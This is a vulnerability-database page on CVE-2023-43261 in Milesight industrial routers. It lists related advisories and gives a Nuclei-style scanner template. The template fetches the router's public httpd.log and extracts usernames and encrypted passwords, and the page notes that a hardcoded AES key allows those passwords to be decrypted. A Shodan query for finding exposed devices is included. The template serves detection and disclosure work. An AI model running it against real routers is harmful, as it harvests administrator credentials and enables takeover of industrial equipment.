| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Milesight UR5X / UR32L / UR32 / UR35 / UR41 Credential Leakage Exploit | 5 Feb 202400:00 | – | zdt | |
| The vulnerability of Milesight UR5X, UR32L, UR32, UR35, and UR41 router microprogramming systems lies in the insufficient protection of service data, allowing attackers to gain unauthorized access to protected information. | 11 Oct 202300:00 | – | bdu_fstec | |
| CVE-2023-43261 | 2 Oct 202310:59 | – | circl | |
| Milesight Log Information Disclosure Vulnerability | 4 Oct 202300:00 | – | cnnvd | |
| CVE-2023-43261 | 4 Oct 202300:00 | – | cve | |
| CVE-2023-43261 | 4 Oct 202300:00 | – | cvelist | |
| Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption | 5 Feb 202400:00 | – | exploitdb | |
| Exploit for Insertion of Sensitive Information into Log File in Milesight Ur5X_Firmware | 28 Sep 202308:45 | – | githubexploit | |
| CVE-2023-43261 | 4 Oct 202312:15 | – | nvd | |
| CVE-2023-43261 | 4 Oct 202312:15 | – | osv |
id: CVE-2023-43261
info:
name: Milesight Routers - Information Disclosure
author: gy741
severity: high
description: |
A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.
impact: |
Unauthenticated attackers can access publicly exposed log files containing encrypted admin and user passwords, then decrypt them using the hardcoded AES key found in JavaScript code, gaining full administrative access to industrial cellular routers.
remediation: |
Update Milesight Industrial Cellular Router firmware to disable directory listing, restrict access to log files, and remove hardcoded cryptographic keys from the web interface.
reference:
- https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
- https://github.com/win3zz/CVE-2023-43261
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261
- http://milesight.com
- http://ur5x.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-43261
cwe-id: CWE-532
epss-score: 0.60113
epss-percentile: 0.99021
cpe: cpe:2.3:h:milesight:ur51:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: milesight
product: ur51
shodan-query: http.html:rt_title
tags: cve2023,cve,router,milesight,disclosure,unauth,iot,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/lang/log/httpd.log"
max-size: 5000
extractors:
- type: regex
regex:
- '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"'
# digest: 490a00463044022001093e226903ec0808971f776fa550a1c422e1f660c651c41f7285d03dced8210220692844c6e2b8104759a1cd9fe68370922a24d8777defd82b5d09ae1a79f30365:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation